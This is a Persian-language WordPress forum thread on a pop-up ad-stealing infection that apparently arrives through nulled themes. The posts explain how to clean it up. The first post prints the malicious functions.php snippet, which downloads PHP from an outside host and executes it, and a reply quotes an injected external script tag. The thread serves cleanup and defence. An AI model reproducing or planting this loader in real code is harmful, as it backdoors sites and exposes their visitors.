master89

ویروس پاپ آپ وردپرس go.pub2srv.com

2 پست در این موضوع قرار دارد

دوستان سلام

یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.

جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!

شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.

توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.

صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.

نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)

آموزش حذف ویروس :

اول سایتتون رو اینجا وارد کنید و چک کنید

https://sitecheck.sucuri.net/  

حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید

و قطعه کد زیر رو ازش حذف کنید



if ( ! function_exists( 'wp_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
{

function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}

?>

حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.

(این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)

سپاس

ویرایش شده در توسط مهدی
1

به اشتراک گذاری این پست


لینک به پست

سلام علیکم

 

سایت ما هم به این مسئله دچار شده و متأسفاه روشی که فرمودین جواب نداد (این سایت ماست)

اگه سورس قالب رو ملاحظه بفرمائید ظاهرا یک فایل جاوا اسکریپت هست که داره تبلیغات پاپ آپ میگیره و با آیدی ادمین سایت چیزی مشخص نیست فقط سایر کاربران می ببینند...

اینم فایل مخرب که البته با فاصله می نویسم تا گوگل صفحه رو بلاک نکنه:

<script src='h t t p s:// cdn. examhome. net/ cdn. j s ? v e r = 1 . 0 . 5 ' type='text/java s c r i p t'></script></p>
0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط macse
      سلام
      خواستم از این طریق قالب پینکوب رو که با الهام از سایت های Pinterest و Unsplash و برخی سایت های مشابه دیگه طراحی شد رو خدمتتون معرفی کنم در ضمن این قالب رایگان و متن باز هستش (بدون متن کپی رایت و... البته اگر من رو بعنوان طراح ذکر کنید خوشحال می شم )
      می تونید از گیت هاب دانلودش کنید و اگر مایل بودید توسعش بدید: https://github.com/qasedak/Pinkoob/releases
      خوشحال میشم اگر باگ یا مشکلی وجود داشت با من برای حل در میان بگذارین.
      برخی امکانات قالب پینکوب
      کاملا واکنشگرا هماهنگی کامل با اصول سئو کاملا قابل شخصی سازی متن باز و تحت مجوز MIT امکان مدیریت تبلیغات (Adsense) و بنر ها امکان تغییر پویا استایل براساس ساعات شبانه روز (استایل شب و روز) امکانات انتخاب استایل ثابت برای قالب (فقط شب یا روز) امکان انتخاب تصویر متخب روز برای نمایش در صفحه اصلی (تصویر دلخواه/تصویر تصادفی/جدیدترین تصویر) امکان شخصی سازی بخش تصویر روزانه درصفحه اصلی نمایش تصاویر صفحه اصلی براساس لایک ها، بازنشرها، دیدگاه ها و یا تصادفی (در بازه زمانی معین) امکان اتصال به دیدگاه های فیس بوک Infinite Scroll نمایش بصورت لایت باکس امکان نمایش قیمت روی تصاویر برای پست های تبلیغاتی (مانند اینستاگرام) امکان ارسال چندین عکس دریک پست (مانند اینستاگرام) امکان زمانبندی پاکسازی رسانه هایی که پست یا آلبوم آنها توسط کاربر پاک شده اند امکان ایجاد یک وبلاگ در کنار شبکه اجتماعی پشتیبانی از افزونه های WP Super cache، Exifography، WP Social Login، WP-Postratings دسته بندی تصاویر بر اساس رنگبندی سیستم جستجو همراه با فیلتر های مختلف و امکان جستجو میان کاربران برای کاربرانی که ثبت نام کرده اند امکان ویرایش دیدگاه برای کاربران پشتیبانی از آپلود ویدیو با فرمت های مختلف (mp4, ogg, webm) بخاطر سپردن آخرین آلبوم مورد استفاده قرار گرفته توسط کاربر امکان افزون تگ با فشردن کلید فاصله بجای استفاده از کاما برای جدا کردن تگ ها امکان تعیین آلبوم پیشفرض برای کاربران نمایش تصاویر مرتبط بر اساس تگ امکان آپلود تصاویر با استفاده از آدرس آنها در وب بصورت مستقیم بسیار کم حجم (۲.۵ مگابایت)
    • توسط alimelody
      درود به همگی دوستان 
      آقا من میخواستم یه برگه دلخواه درست کنم و یک کدی بود که باید توی یه فایل php درست میکردم و کپی میکردم توی هاست 
      بعد از اینکه کد رو کپی کردم کل قالب سایتم ترکید و همچی به هم ریخته 
      حالا من یه بکاپ واسه یکماه پیشمو دارم
      چطور میتونم فایلهایی رو کپی کنم که فقط نمای سایتم برگرده به حالت اول
      یعنی بازگردانی بکاپ نکنم
      ایا راهی داره؟ 
      چون نمیخوام مطالب جدید حذف بشن
      ممنون میشم کمکم کنید سپاس از لطفتون 
      اینم لینک سایتمه
      alimelody.ir
    • توسط Ali Brm
      با سلام خدمت دوستان
      سوالی که داشتم اینه من اخیرا کار روی یک قالبی رو شروع کردم که خب سایت سازنده اش اونو میفروخت ولی من توی یک سایت ایرانی اونو به صورت رایگان گرفتم. فک کنم یه جورایی کرکش کردن
      مشکلی که الان دارم اینه که توی کد سایتم اسم اون سایت فارسی دائما دیده میشه. متاسفانه به خاطر قوانین انجمن نمیتونم نه اسم قالب رو بیارم نه اسم سایت فارسی رو.
      حالا من برای مثال اسم اون سایت فارسی رو میگم "فلان پرس". مثلا اگه توی inspect به فونت متن هام نگاه می کنم اسم فونت رو نوشته "folanpress b Yekan"
      از این موارد بسیار توی قالبم هست و هر روز دارم تو جاهای بیشتر اسمشون رو میبینم.
      چجوری می تونم این اسم رو حذف کنم یا به نظرتون اصلا قالبم رو عوض کنم؟
      این مسئله رو برای چی اون سایت فارسی انجام داده روی Rank سایت خودش تاثیر داره؟
       
    • توسط Ali Brm
      با سلام خدمت دوستان
      سوالی که داشتم درباره شخصی سازی قالب سایتم است.
      در حال طراحی قالب سایتم هستم و از قالب publisher استفاده میکنم. در بعضی قسمت ها مثلا لوگوی سایت، اطراف آن Padding: 25px وجود داره. به فایل CSS قالب رجوع کردم و این عدد رو به 0px تغییر دادم و بعد از سیو مشکلم حل شد و padding اطراف لوگوی سایتم نبود. مشکل اینجاست که مثلا در تنظیمات قالب با استفاده از خوده ورد پرس و خوده ابزارهای قالب کافیه گزینه "ذخیره تنظیمات" رو بزنم تا همه چی دوباره برگرده و Padding مجدد بوجود میاد. این رو هم میدونم که اینها یک سری کد هستند که با زدن "ذخیره تنظیمات" اجرا میشن و اعدادی که دستی تغییر دادم رو مجدد با تنظیمات از پیش تعریف شده قالب رونوشت میکنن. حالا میخوستم بدونم راه حل چیه؟ این یکی از موارد بود. مثلا شاید بخوام هدر سایتم ارتفاع خاصی داشته باشه یا رنگ متنی رو جدا تغییر بدم. چه جوری میتونم این مشکل رو حل کنم؟
      سعی کردم توضیح واضح باشه اگه گویا نیست دوستان بفرمایند تا بیشتر توضیح بدم.
      ممنون و متشکر
    • توسط esmaeil.am
      سلام وقت بخیر من هر قالبی که نصب میکنم این ارور رو میده از فایل فانکشن و فقط خد 8 رو ارور میده مشکل از چیه دوستان ممنون میشم راهنمایی کنید
      Fatal error: Can't use function return value in write context in /home/********/public_html/wp-content/themes/*********/functions.php on line 8